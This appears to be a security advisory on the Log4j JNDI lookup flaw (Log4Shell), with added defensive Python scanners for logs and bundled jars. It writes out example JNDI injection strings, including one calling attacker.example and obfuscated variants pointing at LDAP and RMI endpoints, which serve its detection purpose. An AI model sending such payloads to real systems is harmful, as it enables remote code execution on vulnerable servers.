Apache Log4j JNDI message lookup vulnerability

Added: 12/16/2021

Background

Apache Log4j is a logging library used by many Java applications.

Problem

Log4j 2 expands ${...} lookups that appear inside a logged message, and one of the built-in lookups is JNDI. An attacker who can get a string such as ${jndi:ldap://attacker.example/a} into any logged field (a User-Agent or Referer header, a username, a search term) makes the application's JVM perform a JNDI lookup against the attacker's LDAP or RMI server. The server's response can point the JVM at a remote Java class to download and run, or carry a serialized object that is deserialized on the target; either path gives arbitrary command execution with the privileges of the application (CVE-2021-44228, widely known as Log4Shell).
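
To see what such a string looks like once it lands in a log, here is detection logic run over constructed web-server log lines. This is an added example, not code from the original page or from the Log4j project; the log lines and the 203.0.113.0/24 addresses are made up for illustration. It unwinds the URL-encoding and nested-lookup tricks (${lower:j}, ${::-j}, ${env:NaN:-j}) that were used to evade naive ${jndi: string matching, then reports the scheme and endpoint of every lookup it finds.

```python
import re
import urllib.parse
from typing import Optional

# Innermost ${...} lookup: a body that contains no further "$", "{" or "}".
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup once obfuscation is unwound: ${jndi:<scheme>:[//]<endpoint>
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:/*([^/}\s]*)", re.I)


def _resolve_inner(body: str) -> Optional[str]:
    """Evaluate the lookups attackers nest to hide the 'jndi:' prefix.

    Only lookups whose result is attacker-chosen text are emulated:
    ${x:-val} (default value, e.g. ${::-j} or ${env:NaN:-j}), ${lower:x}, ${upper:x}.
    Anything else, including the jndi lookup itself, is left untouched."""
    if body.lower().lstrip().startswith("jndi"):
        return None
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, sep, arg = body.partition(":")
    if sep:
        if prefix.strip().lower() == "lower":
            return arg.lower()
        if prefix.strip().lower() == "upper":
            return arg.upper()
    return None


def normalize(text: str, max_rounds: int = 20) -> str:
    """Undo URL-encoding and nested-lookup obfuscation so a jndi lookup becomes literal."""
    # Decode repeatedly so double-encoded payloads (%2524%257B...) are handled too.
    while True:
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        changed = False

        def substitute(m: re.Match) -> str:
            nonlocal changed
            resolved = _resolve_inner(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = INNER_LOOKUP.sub(substitute, text)
        if not changed:
            break
    return text


def find_jndi(line: str) -> Optional[dict]:
    """Return scheme, endpoint and the normalized line for a jndi lookup, or None."""
    normalized = normalize(line)
    m = JNDI_LOOKUP.search(normalized)
    if not m:
        return None
    return {"scheme": m.group(1).lower(), "endpoint": m.group(2), "normalized": normalized}


def scan_logs(lines) -> list:
    """Return (line_index, finding) for every line carrying a jndi lookup."""
    return [(i, hit) for i, line in enumerate(lines) if (hit := find_jndi(line))]


# Constructed sample lines in Apache combined log format; 203.0.113.0/24 is a documentation range.
SAMPLE_LOGS = [
    '203.0.113.7 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # plain payload in User-Agent
    '203.0.113.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    # URL-encoded payload in a query parameter, with ${lower:j} hiding the prefix
    '203.0.113.7 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F203.0.113.9%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    # default-value lookups spelling out both "jndi" and "rmi", sent in the Referer header
    '203.0.113.7 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://203.0.113.9:1099/c}" "-"',
    # a non-JNDI lookup: worth a look, but not this vulnerability's payload
    '203.0.113.7 - - [10/Dec/2021:12:00:05 +0000] "GET /search?q=${env:HOME} HTTP/1.1" 200 0 "-" "-"',
]

if __name__ == "__main__":
    for lineno, hit in scan_logs(SAMPLE_LOGS):
        print(f"line {lineno}: {hit['scheme']} -> {hit['endpoint']}")
```

The scanner works on the whole line rather than one header, because the lookup fires wherever the string is logged; the endpoint it extracts is the host the target would have connected to, which is what to hunt for in outbound connection logs.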

Resolution

Upgrade to Apache Log4j 2.12.2 (Java 7) or 2.16.0 or higher (Java 8 and later), or apply the fix from the vendor of the software that embeds Log4j. Later 2.17.x releases closed further issues found after 2.16.0, so consult the Apache security page for the current minimum version. Where an upgrade is not immediately possible, removing the JndiLookup class from the jar (zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class) disables the vulnerable lookup; the log4j2.formatMsgNoLookups setting that circulated early was later found not to cover every code path and is not a sufficient mitigation on its own. Expect to find copies of log4j-core bundled inside application archives (WAR, EAR, fat JARs), not only in system library paths.
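
Finding every copy of log4j-core on a host is the hard part of the upgrade, because the library is usually bundled inside application archives. The scanner below is an added example, not code from this page or from Apache; it reads the version from log4j-core's pom.properties, checks whether JndiLookup.class is still present, recurses into nested jars and wars, and builds its own throw-away sample tree (constructed stand-in jars, not real Log4j builds) so it runs offline. The version ranges it treats as fixed follow the Apache security page: the two lines named above plus the 2.3.x line for Java 6.

```python
import io
import os
import re
import tempfile
import zipfile
from typing import Iterator, Optional, Tuple

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
Version = Tuple[int, int, int]


def parse_version(pom_properties: str) -> Optional[Version]:
    """Pull major.minor.patch out of the 'version=' line of log4j-core's pom.properties."""
    m = re.search(r"^version=(\d+)\.(\d+)\.(\d+)", pom_properties, re.M)
    return (int(m[1]), int(m[2]), int(m[3])) if m else None


def is_fixed_version(v: Version) -> bool:
    """Release lines that close the JNDI lookup hole: 2.16.0+ (Java 8), 2.12.2+ (Java 7), 2.3.1+ (Java 6)."""
    return v >= (2, 16, 0) or (2, 12, 2) <= v < (2, 13, 0) or (2, 3, 1) <= v < (2, 4, 0)


def inspect_archive(zf: zipfile.ZipFile, path: str) -> Iterator[dict]:
    """Report every log4j-core found in an archive, recursing into nested jars/wars."""
    names = set(zf.namelist())
    has_jndi = JNDI_CLASS in names
    version = parse_version(zf.read(POM_PROPS).decode("utf-8", "replace")) if POM_PROPS in names else None
    if has_jndi or version is not None:
        yield {
            "path": path,
            "version": version,
            "jndi_lookup_present": has_jndi,
            # A jar with the class removed (Apache's hot-fix) is safe regardless of version;
            # an unknown version that still ships the class is treated as vulnerable.
            "vulnerable": has_jndi and (version is None or not is_fixed_version(version)),
        }
    for name in sorted(names):
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                nested = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            yield from inspect_archive(nested, f"{path}!/{name}")


def scan_tree(root: str) -> list:
    """Walk a directory and inspect every archive in it; paths are reported relative to root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in sorted(files):
            if not fname.lower().endswith(ARCHIVE_EXT):
                continue
            full = os.path.join(dirpath, fname)
            try:
                with zipfile.ZipFile(full) as zf:
                    findings.extend(inspect_archive(zf, os.path.relpath(full, root)))
            except zipfile.BadZipFile:
                pass
    return findings


def _fake_log4j_core(version: str, with_jndi: bool) -> bytes:
    """Build a stand-in log4j-core jar (constructed test data, not a real Log4j build)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()


def demo() -> dict:
    """Create a throw-away app directory holding four log4j-core copies and scan it."""
    with tempfile.TemporaryDirectory() as root:
        lib = os.path.join(root, "lib")
        os.makedirs(lib)
        samples = {
            "log4j-core-2.14.1.jar": _fake_log4j_core("2.14.1", True),           # vulnerable
            "log4j-core-2.17.1.jar": _fake_log4j_core("2.17.1", True),           # fixed release
            "log4j-core-2.14.1-patched.jar": _fake_log4j_core("2.14.1", False),  # class removed
        }
        for name, data in samples.items():
            with open(os.path.join(lib, name), "wb") as fh:
                fh.write(data)
        # A WAR bundling an old log4j-core under WEB-INF/lib exercises nested-archive handling.
        with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
            war.writestr("WEB-INF/lib/log4j-core-2.12.1.jar", _fake_log4j_core("2.12.1", True))
        return {f["path"]: (f["version"], f["vulnerable"]) for f in scan_tree(root)}


if __name__ == "__main__":
    for path, (version, vulnerable) in demo().items():
        print(f"{'VULNERABLE' if vulnerable else 'ok        '} {version} {path}")
```

Point scan_tree at a real application directory to use it for inventory; note that a shaded jar may lack pom.properties entirely, which is why the presence of JndiLookup.class, not the version string, is what decides the verdict.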

References

https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance
https://logging.apache.org/log4j/2.x/security.html
https://isc.sans.edu/diary/28120

Limitations

The exploit delivers its payload in the User-Agent header, so it only triggers against web applications that pass that header to a vulnerable Log4j logger; the underlying flaw is not limited to User-Agent and fires on any attacker-controlled string that reaches a log call. The target must also be able to open an outbound LDAP or RMI connection to the attacker's listener. On JDKs where com.sun.jndi.ldap.object.trustURLCodebase is false (the default since 8u191, 7u201 and 6u211), the JVM will not load a class from a remote codebase, and exploitation then depends on a deserialization gadget or a suitable factory class already being on the target's classpath.

Platforms

Windows
Linux
